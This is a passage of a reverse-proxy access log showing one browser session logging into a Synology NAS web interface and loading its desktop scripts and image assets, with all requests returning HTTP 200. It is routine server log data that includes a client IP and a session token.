AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 84.1.26.27] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 84.1.26.27] [Length 11206] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 84.1.26.27] [Length 100129] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:09 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login_background.jpg?id=1" [Client 84.1.26.27] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:16 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 69] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/dsm.login.bundle.6928208ca354b3a59af5.4.js" [Client 84.1.26.27] [Length 3157] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/944a992fb1e17b455579f66f923313fb.png" [Client 84.1.26.27] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/2.style.css" +[15/Jan/2026:13:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/1bc43875501e55e5e741e427ca50dbdf.png" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/2.style.css" +[15/Jan/2026:13:51:17 +0000] - 200 200 - GET https nas.profibot.hu "/webman/login/dist/assets/37727926274c0048982bf8cdf53824c8.svg" [Client 84.1.26.27] [Length 5638] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/login/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.API.Auth" [Client 84.1.26.27] [Length 337] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Desktop.PersonalUpdater" [Client 84.1.26.27] [Length 70] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/query.cgi" [Client 84.1.26.27] [Length 9496] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&SynoToken=MbvSA7Zte.JE6&v=1768242326" [Client 84.1.26.27] [Length 3648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1768485081473&SynoToken=MbvSA7Zte.JE6&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_user_service&version=1" [Client 84.1.26.27] [Length 5253] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3333] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?lang=%22hun%22&debug=null&launch_app=null&api=SYNO.Core.Desktop.Initdata&method=get_ui_config&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 109014] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=polling&t=Pl1xDBx" [Client 84.1.26.27] [Length 102] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/34ac1bdf9b5af8bf425905e26994e7a7.png" [Client 84.1.26.27] [Length 1127] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/739a21a1e93de2c1dbf6855ddda88c4c.png" [Client 84.1.26.27] [Length 1809] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/6cef68f76baafc82c0872419a3d9e48b.png" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/aba1d1ad2890d15e40e03c3c8883a34a.png" [Client 84.1.26.27] [Length 1678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:21 +0000] - 200 200 - GET https nas.profibot.hu "/webman/taskbar/dist/assets/5d0db4f65187f9ecb3e6b69bdf1ca516.png" [Client 84.1.26.27] [Length 1151] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/taskbar/dist/style.css?v=1661421011" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/package_center_64.png?v=42962-s9" [Client 84.1.26.27] [Length 4315] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/ControlPanel_64.png?v=42962-s9" [Client 84.1.26.27] [Length 2674] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SynologyAccount/SynologyAccount.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1069] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/images/1x/help_64.png?v=42962-s9" [Client 84.1.26.27] [Length 6618] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=polling&t=Pl1xDD0&sid=P6Ufen8gYxri1boEAAAC" [Client 84.1.26.27] [Length 4] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/2x/default_wallpaper/dsm7_01.jpg?v=42962" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=64&retina=false&path=webman/3rdparty/AntiVirus/images/anti_virus_{0}.png&app_version=1.5.4-3099" [Client 84.1.26.27] [Length 5277] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.BackgroundTask" [Client 84.1.26.27] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=64&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png&app_version=1.3.4-1404" [Client 84.1.26.27] [Length 5416] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/WelcomeApp.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 21702] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1768485081870&SynoToken=MbvSA7Zte.JE6&action=%22external_ip%22&api=SYNO.Core.Desktop.Initdata&method=get&version=1" [Client 84.1.26.27] [Length 113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:22 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/PromotionApp.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 5534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.EW.Info" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpUtils.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LoginNotify/LoginNotify.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/ResetAdminApp.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/Main.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_close.png?v=9135693d6266ca5497970e4b5364da96" [Client 84.1.26.27] [Length 1304] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_maximize.png?v=bd313f935fb44a57c6860fa43665267f" [Client 84.1.26.27] [Length 583] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpBrowser.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 14796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/MainVue.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 16917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/external_device_util.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 500] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/circleGradient.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2456] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/BandwidthControl.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 6408] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/SystemHealthWidget.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 3404] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_title_storage_manager.png?v=42962-s9" [Client 84.1.26.27] [Length 979] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/TreeGrid.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 5290] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_title_system_info.png?v=42962-s9" [Client 84.1.26.27] [Length 917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/wdgt_icn_title_resource_monitor.png?v=42962-s9" [Client 84.1.26.27] [Length 836] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/3c897e31395646e7a99f2edfe18b4636.png" [Client 84.1.26.27] [Length 343] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/7adb794f0fe9d4a77719e41e1a25e1f9.png" [Client 84.1.26.27] [Length 220] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/07d87cfdf16ea8886709ecad67ac55f7.png" [Client 84.1.26.27] [Length 1068] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/dd419236e9fc389651fc2a76836cc31d.png" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/echarts.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 239306] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/StorageUsageWidget.js?v=42962-s9&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 2236] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/f0349137564cce08a5d8ef0e7bdd894e.png" [Client 84.1.26.27] [Length 645] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/4a32c2fb98b5c8f1a9d764347990be42.png" [Client 84.1.26.27] [Length 539] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/1a699af34f3f7f770cb0bcac546baf8b.png" [Client 84.1.26.27] [Length 1304] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/bt_dp_arrow.png?v=962626479046c582bcbb8b90db41783d" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/1x/dd_icn.png?v=e1722eaca6356b2af4425e49a3c8a5b1" [Client 84.1.26.27] [Length 1161] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/resources/css/desktop.css?v=1661421011" +[15/Jan/2026:13:51:23 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/col-move-top.png?v=6813d550c46547038091cf81ed89300f" [Client 84.1.26.27] [Length 965] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 